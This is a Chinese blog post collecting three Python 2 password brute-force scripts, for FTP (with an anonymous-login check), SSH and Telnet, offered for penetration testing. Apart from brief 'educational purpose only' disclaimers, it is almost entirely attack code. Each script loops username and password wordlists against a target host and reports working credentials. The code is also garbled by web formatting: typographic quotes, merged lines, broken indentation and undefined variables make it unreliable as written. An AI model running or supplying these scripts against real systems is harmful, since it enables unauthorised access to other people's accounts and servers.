• 欢迎访问小杰博客网站
  • 欢迎访问小杰博客网站哦

渗透用的python脚本之密码破解

未分类 小杰 8年前 (2015-09-11) 1128次浏览 已收录 0个评论

在渗透测试当中,免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本,并非原创作品,但有借鉴意义。

FTP暴力破解脚本

001 #!/usr/bin/env python
002 #-*-coding = utf-8-*-
003 #author:@xfk
004 #blog:@blog.sina.com.cn/kaiyongdeng
005 #date:@2012-05-08
006  
007 import sys, os, time
008 from ftplib import FTP
009 docs = “””
010            [*] This was written for educational purpose and pentest only. Use it at your own risk. 
011            [*] Author will be not responsible for any damage!
012            [*] Toolname : ftp_bf.py
013            [*] Coder :
014            [*] Version : 0.1
015            [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
016        “””
017  
018 if sys.platform == ‘linux’ or sys.platform == ‘linux2’:
019     clearing = ‘clear’
020 else:
021     clearing = ‘cls’
022 os.system(clearing)
023 R = “\033[31m”;
024 G = “\033[32m”;
025 Y = “\033[33m”
026 END = “\033[0m”
027 def logo():
028     print G+”\n |—————————————————————|”
029     print ” | |”
030     print ” | blog.sina.com.cn/kaiyongdeng |”
031     print ” | 08/05/2012 ftp_bf.py v.0.1 |”
032     print ” | FTP Brute Forcing Tool |”
033     print ” | |”
034     print ” |—————————————————————|\n”
035     print ” \n [-] %s\n” % time.strftime(“%X”)
036     print docs+END
037  
038 def help():
039     print R+”[*]-t, –target ip/hostname <> Our target”
040     print “[*]-u, –usernamelist usernamelist <> usernamelist path”
041     print “[*]-p, –passwordlist passwordlist <> passwordlist path”
042     print “[*]-h, –help help <> print this help”
043     print “[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt”+END sys.exit(1)
044  
045 def bf_login(hostname,username,password):
046     # sys.stdout.write(“\r[!]Checking : %s ” % (p))
047     # sys.stdout.flush()
048     try:
049         ftp = FTP(hostname)
050         ftp.login(hostname,username, password)
051         ftp.retrlines(‘list’)
052         ftp.quit()
053         print Y+”\n[!] w00t,w00t!!! We did it ! ”
054         print “[+] Target : “,hostname, “”
055         print “[+] User : “,username, “”
056         print “[+] Password : “,password, “”+END
057         return 1
058     # sys.exit(1)
059     except Exception, e:
060         pass except KeyboardInterrupt: print R+”\n[-] Exiting …\n”+END
061     sys.exit(1)
062  
063 def anon_login(hostname):
064     try:
065         print G+”\n[!] Checking for anonymous login.\n”+END
066         ftp = FTP(hostname) ftp.login()
067         ftp.retrlines(‘LIST’)
068         print Y+”\n[!] w00t,w00t!!! Anonymous login successfuly !\n”+END
069         ftp.quit()
070     except Exception, e:
071         print R+”\n[-] Anonymous login failed…\n”+END
072         pass
073  
074 def main():
075     logo()
076     try:
077         for arg in sys.argv:
078             if arg.lower() == ‘-t’ or arg.lower() == ‘–target’:
079                 hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
080             elif arg.lower() == ‘-u’ or arg.lower() == ‘–usernamelist’:
081                 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
082             elif arg.lower() == ‘-p’ or arg.lower() == ‘–passwordlist’:
083                 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
084             elif arg.lower() == ‘-h’ or arg.lower() == ‘–help’:
085                 help()
086             elif len(sys.argv) <= 1:
087                 help()
088     except:
089         print R+”[-]Cheak your parametars input\n”+END
090         help()
091          
092     print G+”[!] BruteForcing target …”+END
093     anon_login(hostname)
094     # print “here is ok”
095     # print hostname
096     try:
097         usernames = open(usernamelist, “r”)
098         user = usernames.readlines()
099         count1 = 0
100         while count1 < len(user):
101             user[count1] = user[count1].strip()
102             count1 +=1
103     except:
104         print R+”\n[-] Cheak your usernamelist path\n”+END
105         sys.exit(1)
106          
107     # print “here is ok “,usernamelist,passwordlist
108     try:
109         passwords = open(passwordlist, “r”)
110         pwd = passwords.readlines()
111         count2 = 0
112         while count2 < len(pwd):
113             pwd[count2] = pwd[count2].strip()
114             count2 +=1
115     except:
116         print R+”\n[-] Check your passwordlist path\n”+END
117         sys.exit(1)
118  
119     print G+”\n[+] Loaded:”,len(user),”usernames”
120     print “\n[+] Loaded:”,len(pwd),”passwords”
121     print “[+] Target:”,hostname
122     print “[+] Guessing…\n”+END
123     for u in user: for p in pwd:
124         result = bf_login(hostname,u.replace(“\n”,””),p.replace(“\n”,””))
125         if result != 1:
126             print G+”[+]Attempt uaername:%s password:%s…” % (u,p) + R+”Disenable”+END
127         else:
128             print G+”[+]Attempt uaername:%s password:%s…” % (u,p) + Y+”Enable”+END
129         if not result :
130             print R+”\n[-]There is no username ans password enabled in the list.”
131             print “[-]Exiting…\n”+END
132  
133 if __name__ == “__main__”:
134     main()

SSH暴力破解

001 #!/usr/bin/env python

002 #-*-coding = UTF-8-*-
003 #author@:dengyongkai
004 #blog@:blog.sina.com.cn/kaiyongdeng
005  
006  
007 import sys
008 import os
009 import time
010 #from threading import Thread
011  
012 try:
013     from paramiko import SSHClient
014     from paramiko import AutoAddPolicy
015 except ImportError:
016     print G+”’
017     You need paramiko module.
018  
020  
021     Debian/Ubuntu: sudo apt-get install aptitude
022          : sudo aptitude install python-paramiko\n”’+END
023     sys.exit(1)
024  
025 docs =  “””
026             [*] This was written for educational purpose and pentest only. Use it at your own risk.
027             [*] Author will be not responsible for any damage!                                                              
028             [*] Toolname        : ssh_bf.py
029             [*] Author          : xfk
030             [*] Version         : v.0.2
031             [*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
032     “””
033  
034  
035 if sys.platform == ‘linux’ or sys.platform == ‘linux2’:
036          clearing = ‘clear’
037 else:  
038          clearing = ‘cls’
039 os.system(clearing)
040  
041  
042 R = “\033[31m”;
043 G = “\033[32m”;
044 Y = “\033[33m”
045 END = “\033[0m”
046  
047  
048 def logo():
049          print G+”\n                |—————————————————————|”
050          print ”                |                                                               |”
051          print ”                |               blog.sina.com.cn/kaiyongdeng                    |”
052          print ”                |                16/05/2012 ssh_bf.py v.0.2                     |”
053          print ”                |                  SSH Brute Forcing Tool                       |”
054          print ”                |                                                               |”
055          print ”                |—————————————————————|\n”
056          print ” \n                     [-] %s\n” % time.ctime()
057          print docs+END
058  
059  
060 def help():
061     print Y+”       [*]-H       –hostname/ip       <>the target hostname or ip address”
062     print ”     [*]-P       –port          <>the ssh service port(default is 22)”
063     print ”     [*]-U       –usernamelist      <>usernames list file”
064     print ”     [*]-P       –passwordlist      <>passwords list file”
065     print ”     [*]-H       –help          <>show help information”
066     print ”     [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]”+END
067     sys.exit(1)
068      
069 def BruteForce(hostname,port,username,password):
070         ”’
071         Create SSH connection to target
072         ”’
073         ssh = SSHClient()
074         ssh.set_missing_host_key_policy(AutoAddPolicy())
075         try:
076             ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
077             status = ‘ok’
078             ssh.close()
079         except Exception, e:
080             status = ‘error’
081             pass
082     return status
083  
084  
085 def makelist(file):
086     ”’
087     Make usernames and passwords lists
088     ”’
089     items = []
090  
091     try:
092         fd = open(file, ‘r’)
093     except IOError:
094         print R+’unable to read file \’%s\” % file+END
095         pass
096  
097     except Exception, e:
098         print R+’unknown error’+END
099         pass
100  
101     for line in fd.readlines():
102         item = line.replace(‘\n’, ”).replace(‘\r’, ”)
103         items.append(item)
104     fd.close() 
105     return items
106  
107 def main():
108         logo() 
109 #   print “hello wold”
110         try:   
111                 for arg in sys.argv:
112                         if arg.lower() == ‘-t’ or arg.lower() == ‘–target’:
113                                 hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
114                 if arg.lower() == ‘-p’ or arg.lower() == ‘–port’:
115                     port = sys.argv[int(sys.argv[1:].index(arg))+2]
116                         elif arg.lower() == ‘-u’ or arg.lower() == ‘–userlist’:
117                                 userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
118                         elif arg.lower() == ‘-w’ or arg.lower() == ‘–wordlist’:
119                                 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
120                         elif arg.lower() == ‘-h’ or arg.lower() == ‘–help’:
121                                 help()
122             elif len(sys.argv) <= 1:
123                                 help()
124         except:
125                 print R+”[-]Cheak your parametars input\n”+END
126                 help()
127         print G+”\n[!] BruteForcing target …\n”+END
128 #        print “here is ok”
129 #        print hostname,port,wordlist,userlist
130         usernamelist = makelist(userlist)
131         passwordlist = makelist(wordlist)
132  
133         print Y+”[*] SSH Brute Force Praparing.”
134         print “[*] %s user(s) loaded.” % str(len(usernamelist))
135         print “[*] %s password(s) loaded.” % str(len(passwordlist))
136         print “[*] Brute Force Is Starting…….”+END
137     try:
138             for username in usernamelist:
139                 for password in passwordlist:
140                 print G+”\n[+]Attempt uaername:%s password:%s…” % (username,password)+END
141                         current = BruteForce(hostname, port, username, password)
142                             if current == ‘error’:
143                     print R+”[-]O*O The username:%s and password:%s Is Disenbabled…\n” % (username,password)+END
144 #                               pass
145                             else:
146                                     print G+”\n[+] ^-^ HaHa,We Got It!!!”
147                                     print “[+] username: %s” % username
148                                     print “[+] password: %s\n” % password+END
149 #                                   sys.exit(0)
150     except:
151         print R+”\n[-] There Is Something Wrong,Pleace Cheak It.”
152         print “[-] Exitting…..\n”+END
153         raise
154         print Y+”[+] Done.^-^\n”+END
155         sys.exit(0)
156  
157  
158 if __name__ == “__main__”:
159     main()

TELNET密码暴力破解

01 #!usr/bin/python
02 #Telnet Brute Forcer
04 #d3hydr8[at]gmail[dot]com
05  
06 import threading, time, random, sys, telnetlib
07 from copy import copy
08  
09 if len(sys.argv) !=4:
10     print “Usage: ./telnetbrute.py <server> <userlist> <wordlist>”
11     sys.exit(1)
12  
13 try:
14     users = open(sys.argv[2], “r”).readlines()
15 except(IOError):
16     print “Error: Check your userlist path\n”
17     sys.exit(1)
18    
19 try:
20     words = open(sys.argv[3], “r”).readlines()
21 except(IOError):
22     print “Error: Check your wordlist path\n”
23     sys.exit(1)
24  
25 print “\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0”
26 print “\t————————————————–\n”
27 print “[+] Server:”,sys.argv[1]
28 print “[+] Users Loaded:”,len(users)
29 print “[+] Words Loaded:”,len(words),”\n”
30  
31 wordlist = copy(words)
32  
33 def reloader():
34     for word in wordlist:
35         words.append(word)
36  
37 def getword():
38     lock = threading.Lock()
39     lock.acquire()
40     if len(words) != 0:
41         value = random.sample(words,  1)
42         words.remove(value[0])
43          
44     else:
45         print “\nReloading Wordlist – Changing User\n”
46         reloader()
47         value = random.sample(words,  1)
48         users.remove(users[0])
49          
50     lock.release()
51     if len(users) ==1:
52         return value[0][:-1], users[0]
53     else:
54         return value[0][:-1], users[0][:-1]
55          
56 class Worker(threading.Thread):
57      
58     def run(self):
59         value, user = getword()
60         try:
61             print “-“*12
62             print “User:”,user,”Password:”,value
63             tn = telnetlib.Telnet(sys.argv[1])
64             tn.read_until(“login: “)
65             tn.write(user + “\n”)
66             if password:
67                     tn.read_until(“Password: “)
68                     tn.write(value + “\n”)
69             tn.write(“ls\n”)
70             tn.write(“exit\n”)
71             print tn.read_all()
72             print “\t\nLogin successful:”,value, user
73             tn.close()
74             work.join()
75             sys.exit(2)
76         except:
77             pass
78   
79 for I in range(len(words)*len(users)):
80     work = Worker()
81     work.start()
82     time.sleep(1)

小杰博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:渗透用的python脚本之密码破解
喜欢 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址